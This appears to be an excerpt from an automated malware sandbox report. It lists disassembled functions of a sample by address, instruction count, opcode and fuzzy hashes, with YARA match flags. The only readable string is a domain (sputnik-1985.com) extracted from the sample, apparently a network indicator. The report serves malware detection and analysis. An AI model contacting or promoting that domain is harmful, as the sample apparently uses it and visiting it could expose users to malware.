                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: sputnik-1985.com
                                                                                                                                                                                                                                        • API String ID: 0-2531595869
                                                                                                                                                                                                                                        • Opcode ID: 84beeb3c5bb1be39499917fe814a390f6ab807b448fb432cd8e841c3168bb7c5
                                                                                                                                                                                                                                        • Instruction ID: 764d9d3a4717be79920da73eaae230af95e7e9d95c2812270fe992c1b9b69a95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84beeb3c5bb1be39499917fe814a390f6ab807b448fb432cd8e841c3168bb7c5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE09A389141058FC708CF58C862677B7B0EF0B301F14A06AD982EB3A0E3389D02C7AC
                                                                                                                                                                                                                                        Function 0211F937 Relevance: .8, Instructions: 817COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ee3c8babdd8ca27d4c7d2d50a63fd452c7c20a463d5d8a55cf4e65cb5b776805
                                                                                                                                                                                                                                        • Instruction ID: 315ed3402c9a6e601fe367402de4c0384023fa186efaa2458d8a1e3a203e1341
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee3c8babdd8ca27d4c7d2d50a63fd452c7c20a463d5d8a55cf4e65cb5b776805
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A272CFB1609F818ED329CF3C8805397BFD6AB5A324F188B5DA0FA877D2CB7561018756
                                                                                                                                                                                                                                        Function 02103157 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                                                                                                                                                                                        • Instruction ID: 81de3178b02573627d1b8e82480a43665547980fc46ec917c4d13e48a45f8261
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6052D5715483858FC719CF19C0D06AABBE1FFC8318F1986ADE8A95B391D7B4E849CB41
                                                                                                                                                                                                                                        Function 00402EF0 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                                                                                                                                                                                        • Instruction ID: f14b1a32a054cc5d02357b16e4139c05c7a1a12d214dcc5fef3fcda50377de84
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C52F2715083458FCB14CF24C0806AABFE1BF89314F198A7EF8996B391D779DA49CB85
                                                                                                                                                                                                                                        Function 02111BB6 Relevance: .7, Instructions: 666COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 37211a9a704324c1d47da4259e683596f8723382af120e69f7f272388f5a9581
                                                                                                                                                                                                                                        • Instruction ID: fd683bdb7b64b25e1117a4d46679004425cc6daa7ec5a7adf27abbcdb2c8b754
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37211a9a704324c1d47da4259e683596f8723382af120e69f7f272388f5a9581
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B942D771A44B408FD718DF38C89536ABBE2AF95310F198A3DC9AA8B3D1D775E405CB42
                                                                                                                                                                                                                                        Function 02106AB7 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ac5a0a914cdb46c0dd636e39918af3488c68668d3e5188023bb58f14171f3048
                                                                                                                                                                                                                                        • Instruction ID: 6fa67e4775fe9a603e338c8573b0bf7c840b46e36e55f2672d85ffc05409bacb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac5a0a914cdb46c0dd636e39918af3488c68668d3e5188023bb58f14171f3048
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E52C0B0A88B888FE735CB24C4C43A7FBE1EB45314F14592EC5E646AC6C3B9B586C715
                                                                                                                                                                                                                                        Function 00406850 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8e90048c5e85cf3c38a1b76a8b8bc06c7f3e5a8f31bed9412d846d1be308970a
                                                                                                                                                                                                                                        • Instruction ID: 65e2e910a3c29fe674c350ea84f17f1873166e83f436a48a2f56d7b4a0c34cae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e90048c5e85cf3c38a1b76a8b8bc06c7f3e5a8f31bed9412d846d1be308970a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7652E270A08B848FE731DB24C4847A7BBE1EB52310F15483ED5EB167C2D37DA9958B4A
                                                                                                                                                                                                                                        Function 02130A75 Relevance: .6, Instructions: 614COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
                                                                                                                                                                                                                                        • Instruction ID: 20df6d54f481c9acda1a4af378aaa57303645571e09edf9c498495e0fdb6d169
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A542B3B0505B809FD315CF39C996793BFE1AB56310F18CA9DE4EE8B386C2399445CB92
                                                                                                                                                                                                                                        Function 0043080E Relevance: .6, Instructions: 614COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
                                                                                                                                                                                                                                        • Instruction ID: 7a46f96e6aa3aa7fe73ff395c1311c5ab64b68b87e261d37d1a00d802d05be89
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f25be90f7b65d58be15c4d88bb4d641b8ec0ac9c1adb1457478fca83ecd3ec3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9942B4B0505B809FD315CF39C996793BFE1AB56314F18CA9ED4EE8B382C2399445CB91
                                                                                                                                                                                                                                        Function 02107887 Relevance: .6, Instructions: 612COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                                        • Instruction ID: d15d488aa64868cc07a678b419cb530f32215fa8fa617d1cd0e7327044ef5ae7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D12D332A487528BC725DF18D8806BBF3E2BFC4319F19892DD996972C4D774B812CB42
                                                                                                                                                                                                                                        Function 00407620 Relevance: .6, Instructions: 612COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                                        • Instruction ID: ccb3959594043c792932c0cfc7d39f61c3b1d77d2143a35f25ab615b2c98e1b5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9812B432A0C7118BD725DF18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                                                                                                                                                                                                                        Function 02103B67 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 302ca6eb955e12cdbb1b2a3d679feaf83e016e060d4fed8bf4a7c2766afae2b3
                                                                                                                                                                                                                                        • Instruction ID: 9b042c166b02a5162bedb995254d7440f2844c2548e408d54369b32df5831679
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 302ca6eb955e12cdbb1b2a3d679feaf83e016e060d4fed8bf4a7c2766afae2b3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE3212B0654B118FC328CF29C6D056ABBF1BF85610B504A6ED6A787F90D7B6F885CB10
                                                                                                                                                                                                                                        Function 00403900 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ba850d03f0ab7e2665174e53d7acfed008f992a92a5e68a4f1054f1f90159d3f
                                                                                                                                                                                                                                        • Instruction ID: 8ec60f5116ed2b9ea6bd41125fce4102d17c63a0885b3531693fd8b8e290e5dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba850d03f0ab7e2665174e53d7acfed008f992a92a5e68a4f1054f1f90159d3f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09322370914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7B90D73AF945CB18
                                                                                                                                                                                                                                        Function 00426C76 Relevance: .6, Instructions: 581COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                                        • Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54
                                                                                                                                                                                                                                        Function 00441B20 Relevance: .5, Instructions: 485COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7ed04d1aadee5d9975ad14dd288c61f94734ae74a00a271e6c6ecfca463d8728
                                                                                                                                                                                                                                        • Instruction ID: 0c2c903ba8ab9d1616d7dcc2afe94072de716e40dc01c7b757aa9311b81398a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ed04d1aadee5d9975ad14dd288c61f94734ae74a00a271e6c6ecfca463d8728
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41E1ED35609340CFD348CF68E89062BB7E2FB8A315F19897DE98687362D738E945CB45
                                                                                                                                                                                                                                        Function 0210EC17 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c02c56f115fc56fc7ef3cf88c78f70bbdbcded8e53bb9888c4cf7ade8dd62519
                                                                                                                                                                                                                                        • Instruction ID: 69ec315d63e60c992600bb37ae1d673dc6ff844fed903b72aa8ed83512946cfa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c02c56f115fc56fc7ef3cf88c78f70bbdbcded8e53bb9888c4cf7ade8dd62519
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34123BF0900B00AFC360DF39D946797BFE9EB46260F144A2EE5EE87281D73125058BA2
                                                                                                                                                                                                                                        Function 0040E9B0 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: de8441dc8558bd65ef57b2f38886fcfa8a7ddead37638b165e75500baaeb92e2
                                                                                                                                                                                                                                        • Instruction ID: 0d842de8c269587a107e17bcba800491c000644a8f7bd6d00a783dd33ebb532c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de8441dc8558bd65ef57b2f38886fcfa8a7ddead37638b165e75500baaeb92e2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D123CF0900B00AFC360DF39D946797BFE8EB46360F144A2EE5EE97281D73561158BA6
                                                                                                                                                                                                                                        Function 02105D17 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
                                                                                                                                                                                                                                        • Instruction ID: 3eaeaf9d29f253940d25559e4f309dcc2d6f060e9fe80bb6d2fab921e0eb2167
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69F1AC316487419FC3248F29C89066BFBE6BFD8304F08982DE5D987391E775E845CB92
                                                                                                                                                                                                                                        Function 00405AB0 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                                                                                                                                                                                        • Instruction ID: c31a76099084191e3034c22a37ea28885ef806c0d431935db3893f7feff996f6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92F1DE356087418FC724CF29C88066BFBE6EFD9300F08882EE5D597791E679E845CB96
                                                                                                                                                                                                                                        Function 00441BB0 Relevance: .4, Instructions: 434COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5dcc4d5277b36dac776057e78f9084025f62fcd9f21b15548ac392c780013685
                                                                                                                                                                                                                                        • Instruction ID: 324ad5c95dff1901f2f9d6c111dcb15fcefbb6efdba5ce0306a944ad1c6f7bef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dcc4d5277b36dac776057e78f9084025f62fcd9f21b15548ac392c780013685
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0D1EC35619341CFD348CF28D89062BB7E2EB8A315F09897DE98687362D738E945CB45
                                                                                                                                                                                                                                        Function 00441C40 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 42e109b0e37bac0480ee13d708fd3766a8d6e3a1db4133bb64c56ef7ed5ee544
                                                                                                                                                                                                                                        • Instruction ID: dc21f79cdc73c015b7bd86b7114b814d04dcd303e05c17d6c0f759f64c7459c0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42e109b0e37bac0480ee13d708fd3766a8d6e3a1db4133bb64c56ef7ed5ee544
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4D1ED356193408FD358CF38D89062BB7E2EBCA315F09897DE88687392D738E905CB46
                                                                                                                                                                                                                                        Function 0211D667 Relevance: .4, Instructions: 389COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 24456b8a2a5717e075ed712887d6e124a34d9247993dd7218bbcb4bbbbc13bbd
                                                                                                                                                                                                                                        • Instruction ID: 0b0530209130da29ca8d73efe2dcd89dab5c15e26d14a964439187e677b2c91f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24456b8a2a5717e075ed712887d6e124a34d9247993dd7218bbcb4bbbbc13bbd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EC1C376948301AFD711DF24EC40B1ABBE2BFC5765F148A3CF498A72A0D7B29945CB42
                                                                                                                                                                                                                                        Function 0041D400 Relevance: .4, Instructions: 389COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
